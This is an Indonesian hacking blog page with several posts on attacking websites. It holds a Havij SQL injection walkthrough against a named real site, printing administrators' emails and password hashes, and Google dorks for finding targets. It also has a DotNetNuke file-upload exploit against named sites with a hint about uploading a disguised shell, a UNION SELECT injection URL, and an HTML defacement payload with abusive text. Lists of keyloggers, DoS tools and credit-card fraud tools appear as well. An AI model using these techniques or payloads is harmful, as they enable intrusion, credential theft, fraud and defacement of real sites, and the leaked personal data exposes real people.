Diberdayakan oleh Blogger.
Latest Post
Tampilkan postingan dengan label trik hacker. Tampilkan semua postingan
Tampilkan postingan dengan label trik hacker. Tampilkan semua postingan

Tutorial SQL Injection Menggunakan Havij 1.10

Written By no on Minggu, 03 Februari 2013 | 21.58

Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini.
https://www.box.net/shared/ky9xenske7
Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website.
web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ‘ pada web tsb: http://www.xenia.co.il/index.php?page_id=’93
hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection
Image
Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit).

Image
hasilnya:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id=’93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
w007s…… I Got the database… sekarang klik Tables lalu klik Get Tables.
Image
w007s….. I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu… dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm… 10 detik aja).
Image
w007ss…. cool.. got to check it out… saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm…. saya ceklis aja kolom :
name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s…. ternyata website ini memiliki 3 administrator…
hmmmm… passwordnya di HASH alias di-enkripsi….. no problem… havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat…. 30 detik deh). lalu hasilnya

w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ… password berhasil di-crack.. sekarang tinggal cari halaman login.
Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start…. …. …………. Searching
Image
Got that….
Page Found: http://www.xenia.co.il/login.php
Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan….
U gained an Access
Image
(sumber)
Download: Havij1.10.rar

Cara Hack Dengan Havij


Langkah pertama, cari dulu website yang akan dijadikan target. Buka google, ketik misalkan : inurl:index.php?id=

Setelah kita dapat web target, cek menggunakan tanda petik – '
Buka Tools havij copas url web

Spoiler Hide:


1. Setelah di copas URL’y lalu Klik icon Analyze. Tunggu sampai selesai. (Biarkan sampai status kembali I’m IDLE)
Kalo dagh selesai nanti tampilan’y akan seperti ini :

Spoiler Hide:


2. Selanjut’y Klik icon Tables, tampilan’y seperti ini :

Spoiler Hide:


3. lanjutkan dengan mengKlik Get DBs Screenshoot seperti di bawah ini :

Spoiler Hide:


OK guys...udah keliatan tuwh nama2 dari database’y, tgl dipilih target yg ingin qta perkosa. Qta perkosa Database yg bernama Administrator aja. Very Happy

4. Klik DB Administrator lalu klik Get Tables, nanti akan keluar tables2’y seperti ini :


Spoiler Hide:


5. Next sekarang qta cari columns’y. Cara’y klik hasil yg keluar tadi beberapa columns yg keluar dari tables Administrator seperti ini : isdeleted,tingkat,password,user_name,id
Qta centang user_name and password’y saja lalu klik Get Data.
Ok guys selesai akhir’y password and user_name Admin dah nongol tuwh.

Spoiler Hide:


Tools ini memang cukup banyak fungsi’y, selain sql injection secara otomatic. Tools ini mempunyai banyak fitur lain’y antara lain untuk mencari halaman admin ato mencari password hash MD5.

Spoiler Hide:


Cukup sampe sini aja yak, klo untuk mencari halaman admin’y ato MD5 silahkan di otak-atik sendiri aja. Cara’y mudah kok.

Download Tools Havij : Razz

Memahami Arti Hacker

Written By no on Kamis, 31 Januari 2013 | 21.33

"it's not about hack huck heck hack, let's develop the internet making brighter future for our generations"
"
the real old hackers are people who contribute to internet developments.
it's not just about breaking into but about how we can develop internet.
If you can't make anything your aren't hacker at all
"
- miliki kemampuan pemrograman jaringan
- miliki kemampuan pemrograman sistem
- miliki kemampuan menganalisa kelemahan2 jaringan dan sistem dengan tujuan bukan untuk merusak tapi untuk menciptakan sistem yang lebih aman.
- nasib anak cucu kita ada di tangan kita

* kutipan dari wikipedia
Terminologi peretas muncul pada awal tahun 1960-an di antara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.

Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.

Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

Sumber Artikel Dari: http://cybermanado.blogspot.com/2011/07/memahami-arti-hacker.html#ixzz2JZ0QAEIv

Tool Hacker CD 2007

CD Hacking Tools(Mirror was Updated)
XxxPass-Team 2007
Danger Cracking & Hacking Tools – Ver 1.0
-Exploit Collection (4 Tools)
-Google Hacking (4 Tools)
-Keyloggers (5 Tools)
-Binders & Packer (15 Tools)
-Flood_DOS (20 Tools)
-Messenger (11 Tools)
-Bruter (9 Tools)
-Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
-AIO
Exploit Collection
1.10377 Exploit
2. SMF ShoutBox HTML Injection & Xss
3. Ultimate SMF Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG
Messenger
1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks, moods, meegos and weemees, mugins + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 0.7
11. Yahoo Password Decoder
Google Hacking
1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink
Keyloggers
1. Elgolf 1.0 Beta
2. the ESK RIVER KeyLogger
3. Keylogger Glog
4. HermanAgent
5. IKlogger 0.1
Bbruter
1. WebCrack v 4.0
2. Brutus
3. FTP Crack
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer
!!! $$$ !!!
1. Cmaster
2. Verify CC
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. fake id-
12. Paypal-Link-is Spoofed
13. HoW to get Credit Cards Fresh and Fastest
AIO
1. Uploader for All
2. Cool Small Usefull Dp
Flood DOS
1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. the Web Attacker ENG
5. the TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v 997 b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
2. phpBB Attacker
15. Ping Attack
16. Nuke Site
17. Divine Intervention
18. UC Forum Spammers
19. Inferno Nuker
20. Multiple Site Flood
Please download at:Updated Links!!! Hacking tools 2007
Pass: XxxPass_DJ_haselking
Pass:-XxxPass_DJ_haselking
Hack ... hack ... hack the World!! : D

Tool Hacker

[ Membobol Password ] Ada banyak tool-tool untuk recovery password atau cara membobol password, yaitu dari berbagai program Windows, termasuk Internet Explorer, Outlook Express, Microsoft Outlook, Dialup entri Windows, Yahoo Messenger, MSN Messenger, dan banyak lagi.
Berikut ini berbagai tool recovery password yang menurut saya layak anda coba : 
MessenPass
Recovery Password untuk Aplikasi Instant Messenger di Windows: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dari Netscape 7, Trillian, Miranda, dan Gaim.

Mail PassView
Recovery Password untuk program untuk membobol password email seperti: Windows Live Mail, Windows Mail, Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird. Mail PassView juga dapat memulihkan password dari account email berbasis web (Hotmail, Yahoo, Gmail), jika Anda menggunakan program yang terkait account tersebut.

IE PassView
IE PassView adalah utilitas kecil yang mampu melihat password yang disimpan oleh browser Internet Explorer. Mendukung Internet Explorer 7.0 yang baru dan 8,0, serta versi Internet explorer, v4.0 – v6.0

Protected Storage PassView
Bobol semua password yang tersimpan di dalam Windows Protected Storage, termasuk password AutoComplete Internet Explorer, password situs yang dilindungi sandi, MSN Explorer Sandi, dan banyak lagi …

Dialupass
Tool untuk mengungkapkan semua password yang disimpan dalam entri dial-up Windows. (Internet dan koneksi VPN) Alat ini bekerja di semua versi Windows, termasuk Windows 2000, Windows XP, Windows Vista, Windows 7, dan Windows Server 2003/2008.

RouterPassView
Windows utilitas yang dapat memulihkan password yang hilang dari file konfigurasi yang disimpan oleh router. Utilitas ini hanya bekerja jika router anda menyimpan file konfigurasi di dalam format yang RouterPassView dapat mendeteksi dan decript.

ChromePass
ChromePass adalah tool kecil untuk Windows yang memungkinkan Anda untuk melihat nama pengguna dan password yang disimpan oleh Google Chrome Web browser. Untuk setiap entri kata sandi, informasi berikut ini ditampilkan: Asal URL, Action URL, User Name Field, Field Password, User Name, Password, dan By Time. Anda dapat memilih satu atau lebih item dan kemudian menyimpannya ke dalam text / html / file xml atau menyalinnya ke clipboard.

OperaPassView
OperaPassView adalah alat kecil untuk Windows yang mendekripsi isi dari file browser Web Opera password (wand.dat) dan menampilkan daftar semua password situs yang disimpan dalam file ini. Anda dapat dengan mudah memilih satu atau lebih password dalam jendela OperaPassView, lalu salin ke clipboard daftar password dan simpan ke dalam teks / html / csv / file xml.

WirelessKeyView
Tool kunci jaringan wireless (WEP / WPA) yang tersimpan dalam komputer Anda oleh layanan ‘Wireless Zero Configuration‘ Windows XP dan oleh layanan ‘AutoConfig WLAN’ Windows 7 dan Windows Vista. Hal ini memungkinkan Anda untuk dengan mudah menyimpan semua kunci ke teks / file html / xml, atau menyalin sebuah kunci tunggal ke clipboard.
RemoteDesktop PassView
Remote Desktop PassView adalah utilitas kecil yang mampu melihat sandi yang disimpan oleh utilitas Microsoft Remote Desktop Connection dalam file rdp..

sumber

Tutorial Hacker Pemula

Banyak Metode dan Cara seorang hacker menembus situ atau web seperti berikut ini :
1. IP Spoofing IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network.

 Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda.

 Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.2. FTP Attack Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata- rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service.

Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang. Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
3. Unix Finger Exploits Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim,

 bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.4. Flooding & Broadcasting Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah. Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/ atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet Attacks Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama ( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket- paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits Peng- exploitasian e- mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi (transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering (memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities Berita baru- baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).
8. Password Attacks Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.

9.Proxy Server Attacks Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack Protocol- protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/ tulis (read/ write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program- program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program- program penghancur ini sering juga disebut malware. Program- program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.sebenar nya msh bnyak . . Tapi itu saja sudah cukup

Trik Hacker

Trik ini sangat saya suka karna paling gampang . . Trik ini sering di gunakan oleh hecker . . Pernah kan ngeliat website malaysia yang dikasih bendera indonesia dan lambang hecker indonesia yang tanda nya situs itu udh di hack ama hacker indonesia . . Nah ini lah trik dasar nya . . Tpi jangan di salah gunakan . . Ntar malah di penjara ama pak polisi . . Haha . . Mulai ke trik

1.Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit melalui hape . . bAhan2 yg kita butuhkan adalah: 1.operamini browser versi 5.0 ke atas2.buka operamini v 5.0 anda dan ketik di kolom google search dorknya-> inurl:"/portals/0" And search!!... Nah dapet kan?? Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel. Taruh cursor di link target trus tekan angka 1 di keypad hape anda. Pilih open in new tab. Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab. Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini: http:// securityreason.com/ exploitalert/6234

3.misalkan kita dah dpt targetnya nih... Example site: http://fril.co.il/ portals/0/ cwindex.txt Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn /Providers/ HtmlEditorProviders/ Fck/fcklinkgallery.aspx -> http://site.com/ [path]/portals/0/ a.txt Menjadi -> http://site.com/[path] /Providers/ HtmlEditorProviders/ Fck/ fcklinkgallery.aspx Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik copas lagi. Setelah dapet dan pasti vuln seperti site di bawah ini. http://fril.co.il// Providers/ HtmlEditorProviders/ Fck/ fcklinkgallery.aspx dan buka

4.Setelah site target di buka Pilih : file ( select a file on your site) Tunggu biar loading selesai dan menampilkan 2 kolom: kolom 1 biasanya tulisan 'root' Kolom 2 berisi macam2 file. Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini: javascript:__ doPostBack('ctlURL $cmdUpload','') Lalu klik ok.... Dan Crutz...crutz...crutz...... =)) Kolom yg tdnya berisi 'root' dan 'jenis2 file' Skrg ganti mjd kolom 'root' dan kolom kosong untuk upload file. Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km. SUCCES..!you cAn hacked a web site from mobile phone. Hasilnya seperti ini http://fril.co.il/ portals/0/xadal.txt <100% lwt hape Extensi file yg bisa di upload diantaranya gif,jpg,jpeg,xls,swf,ppt,pda,doc. Trus apa jadinya ya jika kita upload shell dgn extensi gif,atau jpg?< tanya ahlinya saja,atau test ndiri.jgn tanya saia... (emOte benturin kepala ke tembok) Hhhhhhh ... Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab. Siapkan file txt/jpg atau shell.php.gif =)) Desain dulu dr pc trus simpan di hape km. Sapa tau lampu mati atau km sedang berada di tempat yg tdk memungkinkan untuk ol dr pc,bisa iseng2 mencoba seperti di atas

Tips Trik Hacker



Ok langsung saja!
Ketik di google
inurl:/forums.asp?iFor=
trus enter
Pilih target…
Contoh link dari target
http://www.contoh.net/forum/forums.asp?iFor=23
Hapus angka yang ada dibelakang =
Hingga menjadi begini
http://www.contoh.net/forum/forums.asp?iFor=
Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Hingga menjadi seperti ini
http://www.contoh.net/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passwrdnya.
Ok.. sebagai contoh disini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan “POST NEW TOPICS”
Isi Subject nya…
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm……
Jika ingin menutup full seluruh halaman, pake code berikut
<DIV align=center><DIV id=Layer1 style=”BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px; BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: white; layer-background-color: white”><center>
<br><b><font face=”papyrus” color=”red” size=”5″>Attacked by : Ichito-Bandito</font></h2><br><br><img src=”http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg&#8221; ><br><br>
<font face=”papyrus” color=”red” size=”5″>FUCK Malaysial and ASSOCIATE</a><br><br>
<font face=”papyrus” color=”red” size=”5″>We Are Ready to Cybernetic Wars</font><br><br><font color=”red” size=”3″>Hackers-center In Here
</DIV>
Jangan Lupa Di edit dulu kodenya hehehe! Selamat Mencoba :)
And Jagan lupa Sahabat Juga tinggalkan Komentar :) hehehe
Source : http://forum.hackers-center.org
 
Support : Jasa Hacker | Sofware Hacker | Video Hacker
Copyright © 2011. situs hacker indonesia - All Rights Reserved
Template Created by Software Hacker Facebook Published by Kumpulan Hacker
Proudly powered by Blogger
Back to TOP